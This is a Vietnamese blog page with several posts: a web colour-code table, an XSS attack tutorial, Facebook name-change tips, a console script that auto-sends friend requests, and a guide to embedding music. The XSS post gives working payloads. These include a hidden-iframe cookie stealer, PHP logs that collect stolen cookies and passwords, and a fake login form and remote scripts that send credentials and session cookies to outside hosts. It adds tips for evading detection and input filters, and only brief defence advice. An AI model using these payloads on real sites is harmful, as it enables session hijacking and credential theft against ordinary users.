Thứ Năm, 31 tháng 12, 2015

Bảng mã màu cho ACE thiết kế web đây!!!

Bảng mã màu sắc thông dụng và đẹp dùng cho việc thiết kế giao diện website.
F7AFB3FFA8ACF7C4AFFFC0A8FBDBACFFDCA8
F15F66FF5159F1885FFF8151F1B75FFFBA51
EA151EFF000BEA5015FF4700EA9515FF9A00
9A0E14A800079A350EA82E009A620EA86500

BAEDD3A8FFD4BAEDEDA8FFFFBAD3EDA8D4FF
74DCA851FFA974DCDC51FFFF74A8DC51A9FF
33CB8000FF8233CBCB00FFFF3380CB51A9FF
22865400A85522868600A8A82254860055A8

F7D9AFFFDBA8F7E8AFFFECA8F7F5AFFFFCA8
F1B55FFFB851F1D15FFFD951F1EC5FFFFA51
EA9415FF9800EABC15FFC800EAE515FFF900
9A610EA864009A7C0EA884009A970EA8A400

F6BFB1FFBAA8FDC7AAFFC6A8FDD3AAFFD2A8
EE8062FF7651FC8F54FF8E51FCA654FFA551
E64419FF3600FB5B04FF5900FB7D04FF7C00
982D10A82300A53B03A83A00A55203A85100
 
C7DFDEBFE7E5C7D6DFBFD9E7C7CEDFBFCAE7
90C0BE80D0CD90AFC080B4D0909DC08095D0
5CA2A044BBB65C89A24491BB5C6FA24464BB
2D7B783D5B6B2D5F7B3D496B2D427B2D427B

D3EDBAD2FFA8C6EDBABCFFA8BAEDBBA8FFAA
A7DC74A6FF518DDC747AFF5174DC7751FF55
7ECB337DFF0057CB333CFF0033CB3700FF06
53862252A80039862227A80022862400A803
 
D8BAEDDCA8FFE0BAEDEAA8FFE9BAEDF9A8FF
B274DCB951FFC374DCD651FFD574DCF351FF
8E33CB9900FFA733CBC300FFC133CBEE00FF
5D22866400A86E22868000A87F22869D00A8

F6D2B1FFD1A8F6D9B1FFDBA8F6E1B1FFE5A8
EEA562FFA451EEB462FFB851EEC562FFCC51
EEA562FFA451EEB462FFB851EEC562FFCC51
985110A85000986010A86400987010A87700
 
BAE2EDA8EDFFBACFEDA8CBFFBABAEDA8A9FF
74C6DC51DBFF749EDC5197FF7476DC5154FF
33ACCB00CBFF3371CB0067FF3336CB0004FF
2271860085A8224A860043A82223860002A8
.
FDC7AAFFCDA8EDD4BAFFD6A8EDDABAFFDFA8
FC8F54FF8E51DCAB74FFAE51DCB674FFC051
FB5B04FF5900CB8533FF8900CB9433FFA300
A53B03A83A00865722A85A00866122A86B00
 
D9C2E4DEB6F0E3C2E4F0B6ECE4C2D3F0B6D7
B586CABE6DE3C986CAE16DE3CA86A8E36DAF
934DB2A129D6B04DB2D329D6B24D80D6298A
603375691B8D7433758B1B8D7533548D1B5B
 
C0EDBAB2FFA8BAEDBAA8FFA8BAEDD4A8FFD5
81DC7466FF5175DC7452FF5174DCAA51FFAC
46CB331FFF0034CB3301FF0033CB8200FF85
2E862214A80022862200A80022865500A857

CFC8DECDC0E6D6C8DED8C0E6DEC8DEE1C4E2
A091BF9B81CFAF91BFB381CFBD91BFC48AC6
745DA16C46B8895DA19046B89F5DA1A953AB
4D3E6A472F795A3E6A5F2F79693E6A6F3771
 
F3B4BAFFA8B0F3BDB4FFB5A8F3CEB4FFCBA8
E86875FF5162E87C68FF6C51E89C68FF9751
DD2234FF0019DD3E22FF2700DD6E22FF6700
921622A80010922916A81900924816A84300
 
C8DEDEC0E6E5C8DBDEC0E0E6C8D7DEC0DAE6
91BFBE81CFCC91B8BF81C3CF91B0BF81B5CF
5DA19F46B8B55D97A146A7B85D8BA14693B8
3E6A692F79773E636A2F6E793E5C6A2F6179

F7E4AFFFE8A8F7EDAFFFF2A8F7F5AFFFFCA8
F1CB5FFFD251F1DC5FFFE651F1EC5FFFFA51
EAB315FFBD00EACC15FFDB00EAE515FFF900
9A750EA87C009A860EA890009A970EA8A400
 
F3B4C8FFA8C3F3B4B5FFA8A9F3BDB4FFB4A8
E76990FF5187E7696BFF5154E77B69FF6951
DC235CFF004FDC2326FF0004DC3C23FF2300
91173DA80034911719A80002912817A81700
 
BAD3EDA8D4FFBEBAEDAFA8FFD0BAEDCDA8FF
74A8DC51A9FF7D74DC5F51FFA174DC9B51FF
3380CB0082FF4033CB1500FF7433CB6C00FF
2254860055A82A22860D00A84D22864700A8
Share:

Cách tấn công XSS và cách phòng chống [Bảo mật]

I. Tấn công Stored XSS


Stored XSS là lỗi XSS mà đoạn mã chèn thêm vào được lưu trữ trên server, như trong CSDL dưới dạng các comment trong blog, message trong forum hoặc các visitor log.

Khi người dùng vào trang này, thì lập tức các script độc được thực thi, ở đây là sẽ tiến hành lấy trộm cookie của người dùng, rồi lưu nó vào một file txt

Trong nội dung comment ta sẽ viết một đoạn script, chú ý đoạn script này nên viết ở cuối comment để tránh bị phát hiện

<script>
  document.write("<iframe src='http://hacker.php?cookie="+document.cookie+"' height='0' width='0' frameborder='0'></iframe>");
</script>

Ở đây ta sử dụng một iframe có chiều cao và chiều rộng bằng 0, border bằng 0, src của nó dẫn tới trang web của Hacker, trang web này có tác dụng lấy cookie của người dùng nếu người dùng đã đăng nhập.

Ở trang lấy cookie ta viết code để lưu cookie vào một file txt

<?php
if(isset($_GET['cookie']))
 {
   $cookie = $_GET['cookie'];
   // Mở file cookie.txt, tham số a nghĩa là file này mở chỉ để write chứ không scan hay read
   $f=fopen('cookie.txt','a');
  // Ta write địa chỉ trang web mà ở trang đó bị ta chèn script.
   fwrite($f,$_SERVER['HTTP_REFERER']);
  // Ghi giá trị cookie
   fwrite($f,". Cookie la: ".$cookie." \n");
  // Đóng file lại
   fclose($f);
 }
?>

Mở file cookie.txt trên host ta được như sau

http://localhost/baomatweb_sql/XSS/index.php. Cookie la: PHPSESSID=d4a7c08bac0181d69b8d5cc1a72e5c18 
http://localhost/baomatweb_sql/XSS/index.php. Cookie la: PHPSESSID=f64841941357ff4d06ad33e848ff7f26

Phòng chống:

Để phòng chống lỗi XSS này, ta sẽ mã hóa các kí tự < , > để vô hiệu hóa script. trước khi insert nó vào database, tuy bị mã hóa, nhưng lúc hiển thị ra trang web sẽ vẫn là dấu < , > .

$comment = sql_escape($comment);
$comment = htmlentities($comment, ENT_QUOTES, "UTF-8");

Tham số ENT_QUOTES : sẽ mã hóa luôn dấu nháy đơn và nháy kép. UTF-8 là để hiển thị chữ có dấu.

Hàm sql_escape xem trong bài chống lỗi SQL_Injection

2. Tấn công Reflected-XSS: (phản hồi XSS)

Kiểu tấn công này áp dụng đối với những form để nhập dữ liệu đầu vào, đặc biệt là các form search.



Ta thấy từ khóa tìm kiếm mà ta nhập vào ô textbox được hiển thị lại trên trình duyệt. Lợi dụng việc không kiểm soát giá trị này, Hacker thể chèn thêm đoạn mã gây hại vào.

Để biết một form search có bị lỗi XSS hay không, Hacker thường search cụm từ sau:

a"><script>alert(1)</script>

a"> : để đóng thẻ input

Ví dụ: 

<input type="text" value=" a"> " name="formSearch" id="formSearch" />

Sau khi đóng thẻ input, các phần phía sau trở thành mã HTML.

Đoạn javascript để thông báo hiện số 1. Nếu trình duyệt xuất hiện thông báo thì trang web đó bị lỗi XSS. Khi đó Hacker sẽ chèn các đoạn mã độc thay vì hiện thông báo.

Lưu ý: Nhiều trang web  chỉ kiểm tra dữ liệu đầu vào lúc đầu. Do vậy mình sẽ vượt qua nó bằng cách đừng cho vào cặp thẻ script và alert ngay lúc đầu. Mình sẽ chèn thử cái khác để xem nó có bị lỗi không, đồng thời khi mình chèn như vậy thì nó sẽ bị bể code. Sau khi bể code mình mới chèn script vào được. Ví dụ như trang Vdict

Lúc đầu ta search: book">hello để nó bị bể code. Sau đó ta mới chèn script vào.

Tuy nhiên đoạn mã độc hại này chỉ được kích hoạt  khi nạn nhân click đường link trên.

Do vậy, cách mà Hacker sử dụng lỗi này để tấn công người dùng đó là làm sao để người đó click vào các link chứa mã độc này.

Cách tấn công:

Cách 1:

Giả mạo trang đăng nhập để lấy thông tin tài khoản:
http://www.meoi.vn/search.php?keyword=<center><br><br><form method=POST action=http://inrongvang.com.vn/xuli.php>User:<input name=ten><br>Password:<input name=mk><input type=submit value=Send></form><br><!--

Hacker sẽ chèn vào một form đăng nhập, action sẽ chuyển về trang web xử lý của Hacker. Khi nạn nhân thực hiện đăng nhập thì sẽ bị lấy thông tin tài khoản.

Chú ý<!-- là để biến các thành phần HTML phía sau thành chú thích.

File xử lý của Hacker:

<?
$ten=$_POST['ten'];
$mk=$_POST['mk'];

$f=fopen("luu.txt","a");
fwrite($f,"Ten: $ten - mat khau: $mk \n");
fclose($f);
?>
<script>
    location.href="http://meoi.vn"
</script>

Sau khi lấy thông tin đăng nhập, Hacker sẽ lưu nó vào một file, sau đó chuyển hướng về trang chủ để tránh bị phát hiện

Tuy nhiên thay vì đánh tất cả vào đường link search thì Hacker sẽ chuyển nó đến một file js. Trong file js này Hacker mới tạo form đăng nhập. Mục đích của việc này để nạn nhân sẽ không nghi ngờ vì sao đường link dài như vậy.

http://www.meoi.vn/search.php?keyword=<script src=http://long.nhatnghe.vn/xss/xss2.js></script>

File xss2.js

document.body.innerHTML='<Center>Thông tin đăng nhập<BR><form action=http://www.inrongvang.com.vn/xss/xuli1.php method=POST><table><TR><TD>Tên đăng nhập:</TD><TD><input name=ten></TD></TR><TR><TD>Mật khẩu:</TD><TD><input name=mk type=password></TD></TR><TR><TD></TD><TD><input type=submit value=Login></TD></TR></table></form></center>'

Cách 2: Trộm Cookie

Cách này để trộm Cookie của nạn nhân, tức là trộm phiên làm việc hay biến màn hình. Nếu nạn nhân đã đăng nhập vào một trang nào đó. Nếu bị Hacker lấy được cookie thì Hacker sẽ vào thẳng trang đó mà không cần phải đăng nhập. Cái này là do chức năng của biến PHPSESID

http://www.meoi.vn/search.php?keyword=<script src=http://long.nhatnghe.vn/xss/xss3.js></script>

File xss3.js

location.href="http://inrongvang.com.vn/xuli1.php?data="%2bdocument.cookie;

File này sẽ lấy cookie của nạn nhân qua trang xuly1.php

xuli1.php

<?
$data=$_GET['data'];

$f=fopen("luu1.txt","a");
fwrite($f,"Cookie chom ne: $data \n");
fclose($f);
?>
<script>
    location.href="http://meoi.vn"
</script>

Phòng chống:

Để phòng chống lỗi XSS này, thì khi người dùng một từ nào đó, trước khi in từ đó ra màn hình thì mình sẽ mã hóa các dấu "<", ">" .

$tukhoa = sql_escape($tukhoa);
$tukhoa = htmlentities($tukhoa, ENT_QUOTES, "UTF-8");

Tham số ENT_QUOTES : sẽ mã hóa luôn dấu nháy đơn và nháy kép. UTF-8 là để hiển thị chữ có dấu.

Hàm sql_escape xem trong bài chống lỗi SQL_Injection

Lưu ý:

Về sau này, nếu muốn chặn dữ liệu đầu vào bằng Javascript, thì thông thường ta phải cho cái input nó có thuộc tính class hay id nào đó, ví dụ như class="validate_input"... Thì mình nên để cái  class này ngay sau input, đừng để ở cuối vì nếu bị bể code thì cái class sẽ bị mất. Nên để cái class hoặc id trước thuộc tính Value

Ví dụ:

<input type="text" class="validate_input" name="formSearch" id="formSearch" value="" />

Share:

Hướng đẫn đổi tên FB quá 6 lần NEW!!!

- Hôm nay mình sẽ chia sẻ cho mọi người 

Cách đổi tên Facebook lần thứ 6

 ! Cách này hoàn toàn rất dễ và không đòi hỏi bất kỳ điều khó khăn nào ở các bạn.

Click vào link https://www.facebook.com/setti...&view
cach doi ten facebook lan thu 6

Chuyển ngôn ngữ qua : English ( US ) và lưu lại


Sau đó vào https://www.facebook.com/setti...&view đổi tên như bình thường nhé.

Việc đổi tên Facebook quá số lần quy định này là có thật và hoàn toàn nghiêm túc và không có việc lừa đảo lung tung vớ vẩn! Có một số tài khoản nó không cho đổi tên mặc dù đã đổi sang ngôn ngữ English US.

Lưu ý : Chỉ dành cho những người chưa xác nhận với bên Facebook thôi nhé
Share:

Thủ thuật đổi lại tên cũ trên Facebook khi Facebook chuẩn bị Xoá tài khoản tên giả

B1: Vào http://facebook.com/hacked
B2: Next step (Nếu còn nữa cứ bấm next hoặc tiếp tục)
B3: Đến phần chọn lại tên như trong ảnh, chọn lại tên muốn sử dụng và tiếp tục là được
doi lai ten cu tren facebook
Hướng dẫn đổi lại tên cũ trên Facebook
Xong rồi đó. Chúc bạn thành công.
Share:

Code Auto Kết Bạn

Bước 1: Copy hết đoạn mã màu xanh dưới đây.

javascript:var inputs = document.getElementsByClassName('_42ft _4jy0 FriendRequestAdd addButton _4jy3 _517h'); 
for(var i=0; i<inputs.length;i++) { 
inputs[i].click(); 
}

Bước 2: vào danh sách bạn bè mà bạn muốn kết bạn.
Ví dụ: https://www.facebook.com/ngo.sua.02/friends (Thay ngo.sua.02 Thành đường dẫn danh sách bạn bè của bạn.
Bước 3: F12 -> chọn Console -> Paste code trên vào

Bước 4: Enter chờ kết quả


Lưu ý với các bạn là sử dụng thủ thuật này nhiều  rất dễ bị yêu cầu xác nhận tài khoản nên các bạn sử dụng vừa phải không để trường hợp đáng tiếc xảy ra :)
Chúc các bạn thành công!
Share:

Cách chèn nhạc Blog dễ dàng ^^









 

Bước 1: Vào các Website nghe nhạc trực tuyến hiện nay như mp3.zing.vn hay là nhaccuatui.com
Sau đó bạn lựa chọn bài hát mà bạn yêu thích Click vào nút Chia sẻ
Bạn lựa chọn các kiểu nghe trên Blog như Tự động phát hay là Nhạc nền…sau đó Copy toàn bộ phần Code có trong Mã nhúng.
Cach chen nhac vao blog
Bước 2: Đăng nhập vào Blog bằng UserNam và Password của bạn.
Click chọn “Đăng bài mới
Bước 3: Tại đây bạn chuyển sang Tab HTML
Paste vào nội dung bạn đã Copy ở trên
Bước 4: Bạn chuyển sang Tab “Viết”. Nếu hiển thị kết quả như hình bên dưới là bạn đã chèn thành công bản nhạc yêu thích vào Blog.
Bước 5: Sau cùng bạn Click chọn “Xuất bản”. Thoát ra và thưởng thức thành quả của mình vừa làm được

Share: